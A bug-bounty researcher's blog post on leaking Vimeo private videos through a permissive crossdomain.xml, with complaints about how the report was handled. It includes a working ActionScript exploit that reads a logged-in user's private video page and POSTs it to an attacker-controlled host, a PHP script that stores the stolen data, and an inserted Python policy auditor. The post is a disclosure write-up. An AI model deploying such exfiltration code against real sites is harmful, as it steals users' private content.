Hi guys, I hope you are doing well.
Today I will talk about one of my worst experiences in bug bounty programs, with the Vimeo security team.
First, for those who don't know Vimeo:
Vimeo (/ˈvɪmioʊ/) is a video-sharing website in which users can upload, share and view videos. It was the first video sharing site to support high-definition video (started in October 2007). Vimeo was founded in November 2004 by Jake Lodwick and Zach Klein. [wiki]
They started their BB program on HackerOne 2 years ago.
I am not so active these days in BB, but I saw they paid $600 for "Private videos disclosure" and "CSRF on Vimeo leading to private videos go public", so I told myself let's give it a try. So the target wasn't about finding XSS or harmless CSRF; it was about finding a way to leak private videos, since they don't pay well for XSS or other bugs: you will get a duplicate or a mini bounty that you waste a lot of time on.
So I started by reading old reports related to this purpose. Almost every report was about crossdomain.xml file misconfiguration, so I focused on this file around the Vimeo sites.
In their rules there is a point about crossdomain.xml, that it should be exploitable, not just a novel:
- Reports of insecure crossdomain.xml configuration (again, unless you have a working proof of concept -- and not just a report from a scanner)
So I started looking for this file around the sites and tried to find a way to exploit it. I found one here
It allows any domain to send requests to this host, so the first step in the exploit is okay. But we can't say it is a security issue, since the player should work on other hosts.
So let's see what can be leaked, like CSRF token, username, email, etc.
After some tests I found out that player.vimeo.com checks the user's cookie to know whether he is logged in or not. After that it shows him the private video if he has permission to view it.
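The combination described above (a wildcard crossdomain.xml on a host whose responses depend on the session cookie) is what a reviewer would audit for. The following is an added example, not part of the original post: a small Python check of a Flash cross-domain policy. The sample policy, the `serves_cookie_auth_content` flag and the severity labels are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample policy (not fetched from any real host).
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*"/>
  <allow-access-from domain="*.example.com" secure="false"/>
  <allow-access-from domain="static.example.com"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""


def audit_policy(xml_text, serves_cookie_auth_content):
    """Return (severity, message) findings for a Flash cross-domain policy.

    serves_cookie_auth_content: True when the host returns per-user data
    based on the session cookie (an assumption the reviewer supplies).
    """
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            # Any origin may read responses; with cookie-based auth this
            # exposes the logged-in user's pages to third-party SWF files.
            sev = "high" if serves_cookie_auth_content else "info"
            findings.append((sev, "allow-access-from domain=\"*\""))
        elif domain.startswith("*."):
            findings.append(("medium", f"wildcard subdomain {domain}"))
        if el.get("secure", "true").lower() == "false":
            # HTTP-served content would be allowed to read HTTPS responses.
            findings.append(("medium", f"secure=\"false\" for {domain}"))
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*" and el.get("headers") == "*":
            findings.append(("medium", "any origin may send any header"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit_policy(SAMPLE_POLICY, serves_cookie_auth_content=True):
        print(f"[{sev}] {msg}")
```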
Now I am using 2 browsers: Chrome for an unauthenticated user and Firefox for a user (user36551307).
I uploaded a video and set the privacy to only me. Here it is: https://player.vimeo.com/video/182118182
If we open it using FF we will get this:
If we open it using Chrome:
So the source code of the page depends on the user's authentication, and we can leak in both ways!!!
Now we need to write a Flash file to send a request to this URL and leak the source code of the page, and see whether, if we get the source, we can play the video. I copied the source code of the HTML page and saved it on my PC as something like test.html, and it works fine!
I called it leak.swf.
We need to modify readFrom:String and sendTo:String in the Flash file.
```actionscript
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;

    public class XDomainXploit extends Sprite {
        public function XDomainXploit() {
            // URL of the private video for the authenticated user
            var readFrom:String = "https://player.vimeo.com/video/182118182";
            var readRequest:URLRequest = new URLRequest(readFrom);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);

            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to the attacker origin
            var sendTo:String = "http://xxe-me.esy.es/video.php";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();

            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
```
I modified it to the video URL and my host URL. The swf file will send the source code of the Vimeo player to video.php, which will save the source of this page as a new HTML page.
The video.php source code:
```php
<?php
// Read the raw POST body sent by leak.swf
$data = file_get_contents("php://input");
// Append it to private_video.html
$page_content = file_put_contents('private_video.html', $data, FILE_APPEND | LOCK_EX);
if ($page_content === false) {
    die("Didn't work ! ");
} else {
    echo "$page_content exploited !";
}
?>
```
When the file gets the source code of the page from leak.swf, the PHP code will create an HTML page called private_video.html with the source code that it got.
So I made an exploit with a full PoC. Here is the PoC video:
So everything works fine. I wrote a good report with PoC, code, steps and technical details.
I got a bot response that said this is not an issue, please provide a working PoC! I already did, but I sent the video one more time.
After 2 days the team closed the report as:
"Thanks for your report. We are aware of this. This is how we allow custom flash players to work."
I was puzzled why they closed this. It is 100% a security issue! I replied to them and requested to disclose this report publicly.
I waited for days and requested mediation from HackerOne Support. After 30 days the H1 support told me the Vimeo team pushed the public disclosure 2 days and it should be published then. Fine, I will wait to see the reaction of the H1 community. After waiting for 2 days nothing happened! I waited for maybe 10 days and it was not published yet! I contacted H1 support again. The last message I got was this one:
So the Vimeo team never replied to me in the report, and they didn't fix it or contact me for months, and they want 60 days after I requested the PD; above all of this, this report was closed as "Informative".
And the H1 team can do nothing! So I wrote this post to show we aren't in BB heaven.
BTW this is not the first time for the Vimeo team; here is another report without a bounty or a respectful reply: https://hackerone.com/reports/49663
If you have an opinion on this you can comment here or on my Twitter account @Abdulahhusam
That is all.
Thanks for reading.